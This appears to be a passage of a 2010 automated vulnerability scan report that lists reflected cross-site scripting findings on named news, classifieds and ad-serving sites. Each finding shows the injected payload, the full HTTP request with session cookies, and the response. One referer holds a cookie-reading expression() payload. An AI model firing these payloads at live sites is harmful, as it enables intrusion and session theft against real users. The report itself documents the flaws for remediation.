GET /script/pm/100/?29c84"-alert(1)-"471c5bcaf02=1 HTTP/1.1 Host: img.pulsemgr.com Proxy-Connection: keep-alive Referer: http://www.overstock.com/Home-Garden/Nottingham-Brown-Bonded-Leather-Folding-Storage-Ottoman/4783826/product.html?bd49a%22style%3d%22x%3aexpression(alert(document.cookie))%22b5b8b6cc345=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:50:25 GMT Server: Apache/2.2.3 (CentOS) Cache-Control: public, max-age=86400 ETag: "747a6a-23-83494e76ada62" Set-Cookie: c=1; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM" Connection: close Content-Type: text/javascript Content-Length: 6956
function gup(url, param) { if (url.indexOf("?")<0) url = "?"+url; if (url.indexOf("#")<0) url = url+"#"; var regex = new RegExp("[\?&]"+param+"(=(.*?))?[&#]"); var ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29b25"-alert(1)-"ccf6f1bef9a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/ping29b25"-alert(1)-"ccf6f1bef9a/ HTTP/1.1 Host: jobs.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 21:13:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNjAxMjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0bf"><script>alert(1)</script>497d65f7458 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajax/pingad0bf"><script>alert(1)</script>497d65f7458/ HTTP/1.1 Host: jobs.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 21:13:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNjAxMjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.86. http://jobs.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.classifieds.nypost.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae45"><script>alert(1)</script>6f3f69c9f67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /post/?2ae45"><script>alert(1)</script>6f3f69c9f67=1 HTTP/1.1 Host: jobs.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:56:10 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk3MDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11462
1.87. http://jobs.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.classifieds.nypost.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87f71"-alert(1)-"822c074fa59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /post/?87f71"-alert(1)-"822c074fa59=1 HTTP/1.1 Host: jobs.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:56:11 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk3MTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11382
1.88. http://jobs.classifieds.nypost.com/regions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.classifieds.nypost.com
Path:
/regions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5236"-alert(1)-"5fe9f1e64d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions/?d5236"-alert(1)-"5fe9f1e64d9=1 HTTP/1.1 Host: jobs.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:56:18 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk3ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14347
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16958"><script>alert(1)</script>c33d581e80e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /regions/new_york16958"><script>alert(1)</script>c33d581e80e/ HTTP/1.1 Host: jobs.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:56:21 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk4MTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4a8f"-alert(1)-"015644ae2ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions/new_yorka4a8f"-alert(1)-"015644ae2ea/ HTTP/1.1 Host: jobs.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:56:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk4Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.91. http://jobs.classifieds.nypost.com/regions/new_york/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.classifieds.nypost.com
Path:
/regions/new_york/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d798"-alert(1)-"2f826940928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions/new_york/?8d798"-alert(1)-"2f826940928=1 HTTP/1.1 Host: jobs.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:56:14 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwNDk3NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14202
1.92. http://jobs.oodle.com/regions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jobs.oodle.com
Path:
/regions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d084a"-alert(1)-"846303a82a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions/?d084a"-alert(1)-"846303a82a3=1 HTTP/1.1 Host: jobs.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 21:14:00 GMT Content-Length: 22640 Connection: close Set-Cookie: otu=d05dbeea59ec9d5c59b2a90002c123c8; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=034e3f6eedc621bd04d46f6b2f3d20cc; path=/; domain=.oodle.com Set-Cookie: a=dT1EODQwNTlFMDRDRjAyMzE4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODA2MDQwO30%3D; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 784c7'-alert(1)-'9a72d164a38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:50:30 GMT Connection: close Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Fri, 03-Dec-2010 20:50:30 GMT Content-Length: 7452
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-42499110_1290804630","http://ad.doubleclick.net/adj784c7'-alert(1)-'9a72d164a38/cm.ny_post/tier2_082410;net=cm;u=,cm-42499110_1290804630,11bbcecf1d09b9d,biz,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz1-cm.biz_h-cm.sports_h-cm.ent_l-cm.none_h;;cmw=owl;sz=728x90;net=cm;en ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24960'-alert(1)-'72eb4f88e56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.ny_post24960'-alert(1)-'72eb4f88e56/tier2_082410 HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7287 Date: Fri, 26 Nov 2010 20:41:27 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-85432089_1290804087","http://ad.doubleclick.net//cm.ny_post24960'-alert(1)-'72eb4f88e56/tier2_082410;net=cm;u=,cm-85432089_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sport ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4317a'-alert(1)-'3cc42b9ee5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.ny_post/tier2_0824104317a'-alert(1)-'3cc42b9ee5 HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7286 Date: Fri, 26 Nov 2010 20:41:27 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-58617865_1290804087","http://ad.doubleclick.net//cm.ny_post/tier2_0824104317a'-alert(1)-'3cc42b9ee5;net=cm;u=,cm-58617865_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.c ...[SNIP]...
1.96. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://k.collective-media.net
Path:
/cmadj/cm.ny_post/tier2_082410
Issue detail
